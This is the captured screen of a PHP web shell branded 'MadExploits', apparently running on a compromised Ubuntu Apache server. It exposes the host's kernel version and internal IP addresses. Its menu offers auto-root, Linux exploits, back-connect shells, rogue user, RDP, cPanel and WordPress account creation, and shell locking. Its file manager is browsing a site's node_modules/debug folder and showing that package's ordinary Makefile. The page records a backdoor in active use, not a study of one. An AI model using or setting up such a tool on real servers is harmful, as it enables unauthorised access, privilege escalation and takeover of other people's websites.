Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
greenpreneurs /
node_modules /
debug /
[ HOME SHELL ]
Name
Size
Permission
Action
src
[ DIR ]
drwxr-xr-x
.coveralls.yml
46
B
-rw-r--r--
.eslintrc
180
B
-rw-r--r--
.npmignore
72
B
-rw-r--r--
.travis.yml
140
B
-rw-r--r--
CHANGELOG.md
11.43
KB
-rw-r--r--
LICENSE
1.08
KB
-rw-r--r--
Makefile
1.03
KB
-rw-r--r--
README.md
17.5
KB
-rw-r--r--
component.json
321
B
-rw-r--r--
karma.conf.js
1.7
KB
-rw-r--r--
node.js
40
B
-rw-r--r--
package.json
1.11
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
# get Makefile directory name: http://stackoverflow.com/a/5982798/376773 THIS_MAKEFILE_PATH:=$(word $(words $(MAKEFILE_LIST)),$(MAKEFILE_LIST)) THIS_DIR:=$(shell cd $(dir $(THIS_MAKEFILE_PATH));pwd) # BIN directory BIN := $(THIS_DIR)/node_modules/.bin # Path PATH := node_modules/.bin:$(PATH) SHELL := /bin/bash # applications NODE ?= $(shell which node) YARN ?= $(shell which yarn) PKG ?= $(if $(YARN),$(YARN),$(NODE) $(shell which npm)) BROWSERIFY ?= $(NODE) $(BIN)/browserify .FORCE: install: node_modules node_modules: package.json @NODE_ENV= $(PKG) install @touch node_modules lint: .FORCE eslint browser.js debug.js index.js node.js test-node: .FORCE istanbul cover node_modules/mocha/bin/_mocha -- test/**.js test-browser: .FORCE mkdir -p dist @$(BROWSERIFY) \ --standalone debug \ . > dist/debug.js karma start --single-run rimraf dist test: .FORCE concurrently \ "make test-node" \ "make test-browser" coveralls: cat ./coverage/lcov.info | ./node_modules/coveralls/bin/coveralls.js .PHONY: all install clean distclean
Close